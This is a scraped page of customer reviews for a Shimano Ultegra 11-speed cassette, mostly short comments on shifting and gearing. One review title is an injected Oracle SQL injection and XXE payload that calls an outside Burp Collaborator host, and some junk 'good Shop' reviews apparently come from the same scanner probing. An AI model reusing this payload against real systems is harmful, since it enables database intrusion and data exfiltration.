Questions? Call our experts!
1.800.651.4050
X
COVID-19 RESPONSE
DEAL OF THE DAY
ALL SALE ITEMS
SHOP CLOSEOUTS
Shimano Ultegra CS-R8000 11 Speed Cassette

ShimanoUltegra CS-R8000 11 Speed Cassette(Return to Product Page)

Add your own review
(52 customer reviews)
5 stars
4 stars
3 stars
2 stars
1 stars
(43)
(9)
(0)
(0)
(0)
(83%)
(17%)
(0%)
(0%)
(0%)
Ultegra Quality
rating
by ShayneB
Louisville, KY
1 of 1 customers found this review helpful.

Solid cassette at a great price. Installed on a new wheelset. Shifting is smooth and precise. Does everything it is designed to do well.

Reviewed 9/20/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
32t is just that little extra
rating
by GDS PDX
Cycling Enthusiast
Portland, Oregon
0 of 1 customers found this review helpful.

I got a set of climbing specific wheels and wanted a cassette that would leverage that even further. The 32-11 was a good call. I really don't use the 32 that often (most climbs are fine with the 30) but when you hit a wall and need just a little more leverage and a little more confidence, the 32 is nice to have. I was worried about chain length because my other wheelset has a 30-11, but I have had no problem. If I was moving from a 28 to a 32, I'd probably need an extra link or two, but the 30-32 switch has performed fine on an Ultergra Di2 longcage derailleur.

Reviewed 5/21/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
THE RIGHT PRICE FOR GOOD VALUE
rating
by THE BRAD
Cycling Enthusiast
ST. LOUIS, MO

I LOVE THE CASSETTE AND SHIMANO HAS BEEN EXCELLENT DRIVE TRAIN FOR ME SINCE 1986

Reviewed 5/28/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Works well
rating
by Anonymous
Cycling Enthusiast
Omaha, Ne.

Use the product on a Saris trainer. Works great.

Reviewed 11/10/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Cassette works well
rating
by Daniel
Cycling Enthusiast
Tualatin, OR

About every 4th chain I replace my cassette, and this one does the job well.

Reviewed 10/12/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
(select extractvalue(xmltype('?xml version1.0 encodingUTF-8?!DOCTYPE root !ENTITY % wcjvu SYSTEM httpgbv9wq4w2cjy933aknxk3gs1ys4rsiu6xuphg55.burpcollab''orator.net%wcjvu,'),'l') from
rating
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
rating
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
xz0qk7sdqt7fxkrr84l1rxgim9s8gzinafy7ly9n
rating
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Just great!
rating
by Anonymous
2 of 2 customers found this review helpful.

Best for uphill.

Reviewed 11/28/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Great product that I use on all my bikes
rating
by Anonymous
Competitive Racer
0 of 2 customers found this review helpful.

Shimano Ultegra is installed on all my bikes. Never fails me.

Reviewed 1/6/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Five stars, of course its Shimano!
rating
by Mark12
Downers Grove, IL

Just updated my Trek Madone with this wider range cassette. It is perfect!

Reviewed 8/9/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Smooth Shifting
rating
by DPK
Competitive Racer
NorthWest NJ

This cassette works like a dream. Smooth shifting and I always seem to have the gear I need. Nice!

Reviewed 6/14/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Great cassette
rating
by hzayas42
Jersey

This cassette makes my rides more enjoyable, I expect it to last a long time given Shimanos reputation.

Reviewed 6/4/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Works flawlessly like most Shimano products...
rating
by chrichardsm6
Cycling Enthusiast
Walnut Creek, CA

I use it for mountain climbing. Long grades above 10% require me to stand in a 34x28, so this just makes the difference between sitting and standing.

Reviewed 6/1/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Shimano Ultegra 11-30
rating
by Topcow
Los Angeles
1 of 1 customers found this review helpful.

Im really enjoying this new cassette for climbing. Im running this 11-30 with a SRAM RED mid compact setup. Very smooth shifting.

Reviewed 1/28/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Good Price, great service - works as one expects from Shmano
rating
by Bob W
Cycling Enthusiast
Portland, OR

Not much to say about a cassette - other than works well, WBW has great prices and fast service - and Ultegra level has great value.

Reviewed 1/25/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Perfect shifting
rating
by Fairlyunreliable
Portland
1 of 1 customers found this review helpful.

The Ultegra cassette has always been the best balance of price and performance. With the release of the 8000 series comes the new 11-30 cassette, which I really loved for cyclocross. Having the 30t was nice to have on steep courses over the 28 but only a little bit heavier.

Reviewed 1/1/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Ultegra 8000 cassette
rating
by Mark lipchick
Eugene, OR
2 of 2 customers found this review helpful.

Excellent substitute for dura ace with better wear characteristics and only a slight wieght penalty, much lighter on the wallet too.

Reviewed 11/6/2017
Was this review useful to you? Yes/No
Thank you for your feedback.
Performed as advertised. Always good great from shimsno
rating
by Anonymous

Where is your bike works at an excellent job of getting me the product the product was great and the service was even better. I like their return policy

Reviewed 7/25/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Good Product - Great Bang for the Buck.
rating
by Texas Tom
Cycling Enthusiast
Pflugerville, Texas

works well & easy to install

Reviewed 4/11/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Next Page